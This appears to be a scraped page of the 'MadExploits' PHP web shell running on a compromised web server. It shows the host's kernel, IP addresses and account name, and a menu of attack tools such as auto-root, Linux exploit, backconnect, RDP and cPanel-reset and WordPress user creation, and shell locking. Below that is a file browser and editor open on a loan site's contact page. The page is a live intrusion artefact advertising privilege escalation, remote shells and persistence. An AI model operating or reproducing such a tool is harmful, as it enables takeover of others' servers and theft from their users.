Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.116.28.123
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Refinance /
[ HOME SHELL ]
Name
Size
Permission
Action
calculator
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
about.php
1.6
KB
-rw-r--r--
apply-now.php
11.65
KB
-rw-r--r--
blog-single.php
2.91
KB
-rw-r--r--
blog.php
4.36
KB
-rw-r--r--
calculator.php
5.79
KB
-rw-r--r--
contact.php
4.18
KB
-rw-r--r--
faq.php
4.3
KB
-rw-r--r--
index.php
18.53
KB
-rw-r--r--
single-loan.php
5.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.php
<?php include("includes/header.php");?> <div class="page-header"> <div class="container"> <div class="row"> <div class="col-md-12 text-center"> <h2>Contact</h2> <nav aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Home</a></li> <li class="breadcrumb-item active" aria-current="page">contact</li> </ol> </nav> </div> </div> </div> </div> <!-- end of page header --> <section class="section-padding contact-us-padding"> <div class="container"> <div class="row"> <div class="col-md-7"> <div class="get-in-touch"> <h2>Get in Touch</h2> <p>The passages of Lorem Ipsum available but the majority have suffered alteration embarrased</p> </div> <form action="" method="POST"> <div class="row list-input"> <div class="col-md-6 mr0"> <div class="single-get-touch"> <input type="text" name="name" placeholder="Name" required> </div> </div> <div class="col-md-6"> <div class="single-get-touch"> <input type="text" name="phone" placeholder="Phone" required> </div> </div> <div class="col-md-12"> <div class="single-get-touch"> <input type="email" name="email" placeholder="Email" required> </div> </div> <div class="col-md-12"> <div class="single-get-touch"> <textarea name="message" placeholder="Message" required></textarea> </div> </div> <div class="col-md-12"> <div class="single-get-touch"> <button type="submit" name="submit" class="btn btn-default btn-sm">SEND MESSAGE</button> </div> </div> </div> </form> </div> <div class="col-md-5"> <div class="choose-img"> <img src="./img/ceo.png" alt=""> </div> </div> </div> <div class="row"> <div class="col-md-12"> <hr> </div> </div> <div class="row"> <div class="col-md-4"> <div class="single-contact-info"> <div class="icon"> <img src="./img/map-pin-2.png" alt=""> </div> <div class="content"> <p>Loanplus 201, San Francis, <br> United States.</p> </div> </div> </div> <div class="col-md-4"> <div class="single-contact-info"> <div class="icon"> <img src="./img/envalope-3.png" alt=""> </div> <div class="content"> <p>mail@loanplus.com <br> reply within 2 Hours</p> </div> </div> </div> <div class="col-md-4"> <div class="single-contact-info"> <div class="icon"> <img src="./img/call-2.png" alt=""> </div> <div class="content"> <p>+ 44-567-000-0124 <br> Call @ 8.30am to 5.00pm </p> </div> </div> </div> </div> </div> </section> <?php include("includes/footer.php");?>
Close